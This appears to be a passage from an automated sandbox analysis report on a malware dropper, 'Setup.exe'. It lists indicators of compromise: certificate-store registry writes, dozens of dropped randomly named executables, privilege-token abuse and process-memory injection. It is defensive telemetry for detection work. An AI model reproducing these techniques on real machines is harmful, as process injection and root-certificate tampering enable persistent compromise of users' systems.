ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6362000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60b000000010000001a0000004900530052004700200052006f006f0074002000580031000000090000000100000016000000301406082b0601050507030206082b0601050507030114000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e1d000000010000001000000073b6876195f5d18e048510422aef04e3030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Setup.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup.exeeEGpwAFaiH5Tn6mwEgGJ9xt_.exepid process 3900 Setup.exe 3900 Setup.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe 1872 eEGpwAFaiH5Tn6mwEgGJ9xt_.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3208 -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
hrhEFdag2pQKmAwA8AOXAH5Z.exe99B3.exepid process 5204 hrhEFdag2pQKmAwA8AOXAH5Z.exe 3988 99B3.exe 3208 3208 3208 3208 3208 3208 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 7784 msedge.exe 7784 msedge.exe 7784 msedge.exe 7784 msedge.exe 7784 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
4040985.exepid process 2104 4040985.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exekoWWz0CDL9D_1Drwoq08LvCC.exevB85CLYRioIwOWyvE81XtmUq.exeDownFlSetup999.exetaskkill.exe4042726.exeWerFault.exeUqjuQ1dgHGsSiPLUpbp52GVy.exeH9aHWEApAVLTEbLrPMUXwkhu.exepowershell.exevCb_ITY6AL7dTgGs36nKl_Yo.exedescription pid process Token: SeSystemtimePrivilege 4412 svchost.exe Token: SeSystemtimePrivilege 4412 svchost.exe Token: SeIncBasePriorityPrivilege 4412 svchost.exe Token: SeCreateTokenPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeAssignPrimaryTokenPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeLockMemoryPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeIncreaseQuotaPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeMachineAccountPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeTcbPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeSecurityPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeTakeOwnershipPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeLoadDriverPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeSystemProfilePrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeSystemtimePrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeProfSingleProcessPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeIncBasePriorityPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeCreatePagefilePrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeCreatePermanentPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeBackupPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeRestorePrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeShutdownPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeDebugPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeAuditPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeSystemEnvironmentPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeChangeNotifyPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeRemoteShutdownPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeUndockPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeSyncAgentPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeEnableDelegationPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeManageVolumePrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeImpersonatePrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeCreateGlobalPrivilege 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: 31 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: 32 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: 33 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: 34 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: 35 1284 koWWz0CDL9D_1Drwoq08LvCC.exe Token: SeDebugPrivilege 1920 vB85CLYRioIwOWyvE81XtmUq.exe Token: SeDebugPrivilege 4540 DownFlSetup999.exe Token: SeDebugPrivilege 3992 taskkill.exe Token: SeDebugPrivilege 1788 4042726.exe Token: SeRestorePrivilege 3692 WerFault.exe Token: SeBackupPrivilege 3692 WerFault.exe Token: SeDebugPrivilege 4752 UqjuQ1dgHGsSiPLUpbp52GVy.exe Token: SeDebugPrivilege 2032 H9aHWEApAVLTEbLrPMUXwkhu.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeCreateTokenPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeAssignPrimaryTokenPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeLockMemoryPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeIncreaseQuotaPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeMachineAccountPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeTcbPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeSecurityPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeTakeOwnershipPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeLoadDriverPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeSystemProfilePrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeSystemtimePrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeProfSingleProcessPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeIncBasePriorityPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeCreatePagefilePrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeCreatePermanentPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeBackupPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeRestorePrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe Token: SeShutdownPrivilege 5444 vCb_ITY6AL7dTgGs36nKl_Yo.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
installer.exemsedge.exeCalculator.exepid process 6892 installer.exe 7784 msedge.exe 8532 Calculator.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3208 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup.exePSrNEL7YgEJZ0xyCqQYVkq2R.execmd.exe4aT3PF6SgnV8ZkLFpRL7NRID.exeU6DuogN1ECFWruE4A0SlHzun.exedescription pid process target process PID 3900 wrote to memory of 1872 3900 Setup.exe eEGpwAFaiH5Tn6mwEgGJ9xt_.exe PID 3900 wrote to memory of 1872 3900 Setup.exe eEGpwAFaiH5Tn6mwEgGJ9xt_.exe PID 3900 wrote to memory of 1080 3900 Setup.exe PSrNEL7YgEJZ0xyCqQYVkq2R.exe PID 3900 wrote to memory of 1080 3900 Setup.exe PSrNEL7YgEJZ0xyCqQYVkq2R.exe PID 3900 wrote to memory of 1244 3900 Setup.exe RD7xOcy3VQHmAwSgZbhezd8B.exe PID 3900 wrote to memory of 1244 3900 Setup.exe RD7xOcy3VQHmAwSgZbhezd8B.exe PID 3900 wrote to memory of 1244 3900 Setup.exe RD7xOcy3VQHmAwSgZbhezd8B.exe PID 3900 wrote to memory of 1508 3900 Setup.exe CPrpRnM8IeYXmA2gAu6BvtNE.exe PID 3900 wrote to memory of 1508 3900 Setup.exe CPrpRnM8IeYXmA2gAu6BvtNE.exe PID 3900 wrote to memory of 1572 3900 Setup.exe RvxGhnQ_OEMC18xXwR0VxQcn.exe PID 3900 wrote to memory of 1572 3900 Setup.exe RvxGhnQ_OEMC18xXwR0VxQcn.exe PID 3900 wrote to memory of 1572 3900 Setup.exe RvxGhnQ_OEMC18xXwR0VxQcn.exe PID 3900 wrote to memory of 1564 3900 Setup.exe 4aT3PF6SgnV8ZkLFpRL7NRID.exe PID 3900 wrote to memory of 1564 3900 Setup.exe 4aT3PF6SgnV8ZkLFpRL7NRID.exe PID 3900 wrote to memory of 1564 3900 Setup.exe 4aT3PF6SgnV8ZkLFpRL7NRID.exe PID 3900 wrote to memory of 1552 3900 Setup.exe 2cueFNHmLXQajzNJ90hDfGNw.exe PID 3900 wrote to memory of 1552 3900 Setup.exe 2cueFNHmLXQajzNJ90hDfGNw.exe PID 3900 wrote to memory of 1552 3900 Setup.exe 2cueFNHmLXQajzNJ90hDfGNw.exe PID 3900 wrote to memory of 3036 3900 Setup.exe QYUmrdKRz8BDDtM93WnnT1fs.exe PID 3900 wrote to memory of 3036 3900 Setup.exe QYUmrdKRz8BDDtM93WnnT1fs.exe PID 3900 wrote to memory of 3036 3900 Setup.exe QYUmrdKRz8BDDtM93WnnT1fs.exe PID 3900 wrote to memory of 1744 3900 Setup.exe 3Epq67p4ckusTei5nXzNLNK0.exe PID 3900 wrote to memory of 1744 3900 Setup.exe 3Epq67p4ckusTei5nXzNLNK0.exe PID 3900 wrote to memory of 1744 3900 Setup.exe 3Epq67p4ckusTei5nXzNLNK0.exe PID 3900 wrote to memory of 3132 3900 Setup.exe yuXeMxxM0BfMLtDDhBTtQsDP.exe PID 3900 wrote to memory of 3132 3900 Setup.exe yuXeMxxM0BfMLtDDhBTtQsDP.exe PID 3900 wrote to memory of 3132 3900 Setup.exe yuXeMxxM0BfMLtDDhBTtQsDP.exe PID 3900 wrote to memory of 488 3900 Setup.exe Ctryp2hRVmlso4rkGtOzVamP.exe PID 3900 wrote to memory of 488 3900 Setup.exe Ctryp2hRVmlso4rkGtOzVamP.exe PID 3900 wrote to memory of 488 3900 Setup.exe Ctryp2hRVmlso4rkGtOzVamP.exe PID 3900 wrote to memory of 2032 3900 Setup.exe H9aHWEApAVLTEbLrPMUXwkhu.exe PID 3900 wrote to memory of 2032 3900 Setup.exe H9aHWEApAVLTEbLrPMUXwkhu.exe PID 3900 wrote to memory of 2032 3900 Setup.exe H9aHWEApAVLTEbLrPMUXwkhu.exe PID 3900 wrote to memory of 4752 3900 Setup.exe UqjuQ1dgHGsSiPLUpbp52GVy.exe PID 3900 wrote to memory of 4752 3900 Setup.exe UqjuQ1dgHGsSiPLUpbp52GVy.exe PID 3900 wrote to memory of 4752 3900 Setup.exe UqjuQ1dgHGsSiPLUpbp52GVy.exe PID 3900 wrote to memory of 3488 3900 Setup.exe hrhEFdag2pQKmAwA8AOXAH5Z.exe PID 3900 wrote to memory of 3488 3900 Setup.exe hrhEFdag2pQKmAwA8AOXAH5Z.exe PID 3900 wrote to memory of 3488 3900 Setup.exe hrhEFdag2pQKmAwA8AOXAH5Z.exe PID 3900 wrote to memory of 1284 3900 Setup.exe koWWz0CDL9D_1Drwoq08LvCC.exe PID 3900 wrote to memory of 1284 3900 Setup.exe koWWz0CDL9D_1Drwoq08LvCC.exe PID 3900 wrote to memory of 1284 3900 Setup.exe koWWz0CDL9D_1Drwoq08LvCC.exe PID 3900 wrote to memory of 1920 3900 Setup.exe vB85CLYRioIwOWyvE81XtmUq.exe PID 3900 wrote to memory of 1920 3900 Setup.exe vB85CLYRioIwOWyvE81XtmUq.exe PID 3900 wrote to memory of 1920 3900 Setup.exe vB85CLYRioIwOWyvE81XtmUq.exe PID 1080 wrote to memory of 1516 1080 PSrNEL7YgEJZ0xyCqQYVkq2R.exe cmd.exe PID 1080 wrote to memory of 1516 1080 PSrNEL7YgEJZ0xyCqQYVkq2R.exe cmd.exe PID 3900 wrote to memory of 4980 3900 Setup.exe U6DuogN1ECFWruE4A0SlHzun.exe PID 3900 wrote to memory of 4980 3900 Setup.exe U6DuogN1ECFWruE4A0SlHzun.exe PID 3900 wrote to memory of 4980 3900 Setup.exe U6DuogN1ECFWruE4A0SlHzun.exe PID 1516 wrote to memory of 3256 1516 cmd.exe extd.exe PID 1516 wrote to memory of 3256 1516 cmd.exe extd.exe PID 1564 wrote to memory of 1180 1564 4aT3PF6SgnV8ZkLFpRL7NRID.exe cutm3.exe PID 1564 wrote to memory of 1180 1564 4aT3PF6SgnV8ZkLFpRL7NRID.exe cutm3.exe PID 1564 wrote to memory of 4540 1564 4aT3PF6SgnV8ZkLFpRL7NRID.exe DownFlSetup999.exe PID 1564 wrote to memory of 4540 1564 4aT3PF6SgnV8ZkLFpRL7NRID.exe DownFlSetup999.exe PID 1564 wrote to memory of 3736 1564 4aT3PF6SgnV8ZkLFpRL7NRID.exe inst3.exe PID 1564 wrote to memory of 3736 1564 4aT3PF6SgnV8ZkLFpRL7NRID.exe inst3.exe PID 1564 wrote to memory of 3736 1564 4aT3PF6SgnV8ZkLFpRL7NRID.exe inst3.exe PID 3900 wrote to memory of 4796 3900 Setup.exe iZ4M1J96Sntem8227kHDdgjJ.exe PID 3900 wrote to memory of 4796 3900 Setup.exe iZ4M1J96Sntem8227kHDdgjJ.exe PID 3900 wrote to memory of 4796 3900 Setup.exe iZ4M1J96Sntem8227kHDdgjJ.exe PID 4980 wrote to memory of 1424 4980 U6DuogN1ECFWruE4A0SlHzun.exe mshta.exe PID 4980 wrote to memory of 1424 4980 U6DuogN1ECFWruE4A0SlHzun.exe mshta.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\eEGpwAFaiH5Tn6mwEgGJ9xt_.exe"C:\Users\Admin\Pictures\Adobe Films\eEGpwAFaiH5Tn6mwEgGJ9xt_.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\PSrNEL7YgEJZ0xyCqQYVkq2R.exe"C:\Users\Admin\Pictures\Adobe Films\PSrNEL7YgEJZ0xyCqQYVkq2R.exe"2⤵
- Executes dropped EXE
